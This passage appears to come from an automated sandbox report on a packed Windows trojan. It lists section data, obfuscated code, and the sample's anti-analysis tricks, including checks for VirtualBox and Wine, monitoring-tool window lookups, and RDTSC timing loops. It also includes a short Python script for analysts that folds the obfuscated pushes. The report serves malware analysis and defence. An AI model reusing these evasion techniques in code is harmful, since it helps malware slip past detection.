                    0_2_005F45C4, 0_2_001D45A8, 0_2_001FD5A8, 0_2_005F95BD, 0_2_0020A648, 0_2_005EF6D4, 0_2_001D66C8,
                    0_2_002196FD, 0_2_001ED720, 0_2_00206799, 0_2_001E4868, 0_2_001E98B8, 0_2_001EB8A8, 0_2_001FF8D6,
                    0_2_005F7AEE, 0_2_005E8A9F, 0_2_005E3A91, 0_2_005EDB57, 0_2_00541B3A, 0_2_00204BA8, 0_2_00200B88,
                    0_2_005F2BEB, 0_2_001F8BD9, 0_2_0020AC28, 0_2_001FAD38, 0_2_001C1D78, 0_2_001EBD68, 0_2_001E5DB9,
                    0_2_00524D86, 0_2_001E4DC8, 0_2_001D8E78, 0_2_00201EE8, 0_2_005E6F2A, 0_2_005F5FDB, 0_2_005E1FBE
                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00194610 appears 316 times
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exe | Static PE information: Section: jfbmubxy ZLIB complexity 0.9951572878925121
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YX7KISKI.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Sections loaded (in load order): apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exe | Static file information: File size 2134016 > 1048576
                Source: file.exe | Static PE information: Raw size of jfbmubxy is bigger than: 0x100000 < 0x19e000
                Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.190000.0.unpack
                    section rights in memory: (blank):EW; .rsrc:W; .idata:W; (blank):EW; jfbmubxy:EW; qpyydaeu:EW; .taggant:EW
                    section rights on disk:   (blank):ER; .rsrc:W; .idata:W; (blank):EW; jfbmubxy:EW; qpyydaeu:EW; .taggant:EW
                    (the first, unnamed section is execute/read on disk but execute/write once unpacked, which is the section-rights change this report flags)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x2090fd should be: 0x20d196
                Source: file.exe | Static PE information: section name: (blank)
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name: (blank)
                Source: file.exe | Static PE information: section name: jfbmubxy
                Source: file.exe | Static PE information: section name: qpyydaeu
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0069602F, instruction at 0_2_00696054: push ecx; mov dword ptr [esp], 76FDD07Ah
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0068A03C, instruction at 0_2_0068A040: push eax; mov dword ptr [esp], edi
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006E5039, instruction at 0_2_006E5107: push 744BB343h; mov dword ptr [esp], ecx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00680033, instruction at 0_2_0068007D: push ebx; mov dword ptr [esp], edx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_004DE0D4, instruction at 0_2_004DE11A: push 42635D07h; mov dword ptr [esp], ebx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_004DE0D4, instruction at 0_2_004DE12D: push 4CBEE7BAh; mov dword ptr [esp], ebp
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006DC0DA, instruction at 0_2_006DC0EE: push eax; mov dword ptr [esp], edx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_001BA0DC, instruction at 0_2_001BA0F1: push eax; retf
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC09A: push edi; mov dword ptr [esp], edx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC0B9: push 7103705Bh; mov dword ptr [esp], ecx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC0BD: push esi; mov dword ptr [esp], 54EF60ACh
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC102: push 6CBAF79Ah; mov dword ptr [esp], esi
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC11B: push 33105D20h; mov dword ptr [esp], edi
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC176: push edi; mov dword ptr [esp], 5AB8A80Ch
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC1B2: push eax; mov dword ptr [esp], 24C8BAC5h
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC1C3: push eax; mov dword ptr [esp], edx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC229: push 6CDF014Fh; mov dword ptr [esp], eax
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC26B: push eax; mov dword ptr [esp], ecx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC2E1: push ecx; mov dword ptr [esp], 0AB70FB1h
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC344: push ebp; mov dword ptr [esp], 2FDF2066h
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC37D: push eax; mov dword ptr [esp], 00000004h
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC398: push 6E4B16CAh; mov dword ptr [esp], esp
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC3C4: push esi; mov dword ptr [esp], edi
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC437: push 623BA901h; mov dword ptr [esp], ebp
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC43B: push ecx; mov dword ptr [esp], 6BCB5085h
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC5AC: push ebp; mov dword ptr [esp], 4B4F38FBh
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC5CB: push edx; mov dword ptr [esp], 4173A283h
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC614: push 00A08A00h; mov dword ptr [esp], esi
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC639: push 69AB1359h; mov dword ptr [esp], edx
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC643: push 19A480E9h; mov dword ptr [esp], esi
                Source: C:\Users\user\Desktop\file.exe | Code function 0_2_005EC092, instruction at 0_2_005EC6A8: push 72DAB8BCh; mov dword ptr [esp], eax
                Source: file.exe | Static PE information: section name: jfbmubxy entropy: 7.954398725393829
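The `push X; mov dword ptr [esp], Y` pairs listed above are an obfuscated push: the value pushed by the first instruction is immediately overwritten by the second, so the pair is equivalent to a plain `push Y` and the pushed register or constant is noise. The one exception is `mov dword ptr [esp], esp`, which stores the post-push stack pointer, whereas `push esp` would store the pre-push value, so that pair must not be folded. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample; it normalizes a text listing of such pairs into their effective form. The listing is constructed from instruction pairs quoted in this report, and the simplified output lines are a reconstruction, not sandbox output.

```python
import re

# Constructed from pairs quoted in this report; the addresses are the ones Joe Sandbox printed.
LISTING = """\
0_2_00696054 push ecx; mov dword ptr [esp], 76FDD07Ah
0_2_0068A040 push eax; mov dword ptr [esp], edi
0_2_006E5107 push 744BB343h; mov dword ptr [esp], ecx
0_2_005EC37D push eax; mov dword ptr [esp], 00000004h
0_2_005EC398 push 6E4B16CAh; mov dword ptr [esp], esp
0_2_001BA0F1 push eax; retf
"""

# "<addr> push <X>; mov dword ptr [esp], <Y>" where X is a register or an immediate.
PAIR = re.compile(
    r"^(?P<addr>\S+)\s+push (?P<pushed>[^;]+);\s*mov dword ptr \[esp\],\s*(?P<real>\S+)$"
)


def normalize_line(line: str):
    """Return (address, effective_instruction, was_obfuscated_push).

    push X; mov [esp], Y  ==>  push Y   (X is dead; only Y reaches the stack slot)
    Anything else (e.g. 'push eax; retf', a control-flow trick) is passed through.
    """
    line = line.strip()
    m = PAIR.match(line)
    if not m:
        addr, _, rest = line.partition(" ")
        return addr, rest, False
    real = m.group("real")
    if real.lower() == "esp":
        # [esp] := esp AFTER the push; 'push esp' would store the value BEFORE it.
        return m.group("addr"), "push <esp after push>", True
    return m.group("addr"), f"push {real}", True


def normalize_listing(text: str):
    """Normalize every non-empty line of a listing."""
    return [normalize_line(l) for l in text.splitlines() if l.strip()]


def obfuscation_ratio(text: str) -> float:
    """Fraction of lines that were obfuscated pushes; a coarse packer fingerprint."""
    rows = normalize_listing(text)
    return sum(1 for r in rows if r[2]) / len(rows)


if __name__ == "__main__":
    for addr, ins, flagged in normalize_listing(LISTING):
        print(f"{addr}  {ins:28s} {'<- folded' if flagged else ''}")
    print(f"obfuscated pushes: {obfuscation_ratio(LISTING):.0%}")
```

Run against a larger export of the same function (0_2_005EC092 alone contributes 23 such pairs above), the folded form is what you would feed into further analysis; the raw pairs only inflate the instruction count and hide which constants actually reach the stack.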

                Boot Survival

                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass (twice)
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS (twice)
                Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-37768)
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 47E3E9 second address: 47DCA1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418C0B128h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D24B1h], ebx 0x00000013 push dword ptr [ebp+122D03E5h] 0x00000019 cmc 0x0000001a call dword ptr [ebp+122D1839h] 0x00000020 pushad 0x00000021 jmp 00007FB418C0B12Ah 0x00000026 or dword ptr [ebp+122D1C94h], ecx 0x0000002c xor eax, eax 0x0000002e xor dword ptr [ebp+122D253Ah], edi 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 cmc 0x00000039 mov dword ptr [ebp+122D3956h], eax 0x0000003f mov dword ptr [ebp+122D1C94h], esi 0x00000045 mov esi, 0000003Ch 0x0000004a pushad 0x0000004b pushad 0x0000004c jmp 00007FB418C0B132h 0x00000051 movsx ecx, cx 0x00000054 popad 0x00000055 mov dword ptr [ebp+122D1C94h], ecx 0x0000005b popad 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 mov dword ptr [ebp+122D2E52h], edx 0x00000066 jmp 00007FB418C0B133h 0x0000006b lodsw 0x0000006d pushad 0x0000006e push edi 0x0000006f cmc 0x00000070 pop eax 0x00000071 mov edi, 0A1F7C70h 0x00000076 popad 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b cld 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 add dword ptr [ebp+122D253Ah], eax 0x00000086 push eax 0x00000087 push eax 0x00000088 push edx 0x00000089 push esi 0x0000008a jl 00007FB418C0B126h 0x00000090 pop esi 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDBBA second address: 5FDBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDBBF second address: 5FDBC9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB418C0B132h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5FDE61 second address: 5FDE9A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB418E85325h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB418E85325h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FB418E85316h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 601234 second address: 601239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6012F2 second address: 601369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 6990323Ah 0x0000000e mov esi, dword ptr [ebp+122D284Fh] 0x00000014 push 00000003h 0x00000016 jmp 00007FB418E85320h 0x0000001b push 00000000h 0x0000001d sub dword ptr [ebp+122D3279h], edi 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007FB418E85318h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D2D26h], ebx 0x00000045 push D79EFA52h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FB418E85327h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 60145A second address: 60146D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418C0B12Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60146D second address: 6014A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 js 00007FB418E85320h 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d jnp 00007FB418E85316h 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007FB418E85318h 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6014A6 second address: 6014B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB418C0B126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6014B0 second address: 601533 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 jmp 00007FB418E85325h 0x00000016 jl 00007FB418E85318h 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f pop eax 0x00000020 and si, FD00h 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007FB418E85318h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 push 00000000h 0x00000043 mov ecx, eax 0x00000045 push 00000003h 0x00000047 mov esi, dword ptr [ebp+122D3A02h] 0x0000004d call 00007FB418E85319h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FB418E85321h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601533 second address: 60153D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FB418C0B126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60153D second address: 601566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FB418E8532Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601566 second address: 60158D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e js 00007FB418C0B128h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007FB418C0B126h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60158D second address: 60160F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FB418E85321h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FB418E8531Dh 0x0000001a pop eax 0x0000001b call 00007FB418E85320h 0x00000020 sub esi, 206663C2h 0x00000026 pop esi 0x00000027 lea ebx, dword ptr [ebp+124570E5h] 0x0000002d call 00007FB418E8531Ah 0x00000032 mov dword ptr [ebp+122D1EE9h], ecx 0x00000038 pop edx 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FB418E8531Fh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FB418E8531Ah 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60160F second address: 601614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6135DD second address: 613600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB418E8531Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E8531Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621B3A second address: 621B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6A4F second address: 5E6A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6A53 second address: 5E6A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FA42 second address: 61FA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FB418E85323h 0x0000000b jmp 00007FB418E8531Dh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61FE9D second address: 61FEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620044 second address: 62005D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Fh 0x00000007 jng 00007FB418E85322h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620341 second address: 62036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB418C0B131h 0x00000010 push ecx 0x00000011 jns 00007FB418C0B126h 0x00000017 pop ecx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620692 second address: 6206B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85325h 0x00000007 js 00007FB418E85316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620836 second address: 620845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 je 00007FB418C0B126h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620C1A second address: 620C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB418E85316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614B30 second address: 614B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614B36 second address: 614B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 614B3C second address: 614B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620D93 second address: 620DF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jo 00007FB418E85316h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007FB418E85322h 0x00000012 jmp 00007FB418E8531Ch 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d push ebx 0x0000001e ja 00007FB418E85316h 0x00000024 jp 00007FB418E85316h 0x0000002a pop ebx 0x0000002b pushad 0x0000002c push edi 0x0000002d pop edi 0x0000002e jc 00007FB418E85316h 0x00000034 jmp 00007FB418E8531Dh 0x00000039 push esi 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 push edi 0x00000041 pop edi 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621A0B second address: 621A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FB418C0B12Bh 0x0000000c popad 0x0000000d jg 00007FB418C0B134h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625232 second address: 62524F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007FB418E85322h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6256B0 second address: 6256B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62403A second address: 624044 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418E8531Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624044 second address: 624051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 624051 second address: 624057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625952 second address: 625972 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB418C0B134h 0x0000000c jmp 00007FB418C0B12Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push esi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625972 second address: 625978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626D7A second address: 626D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BFB3 second address: 62BFBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BFBD second address: 62BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C27D second address: 62C283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
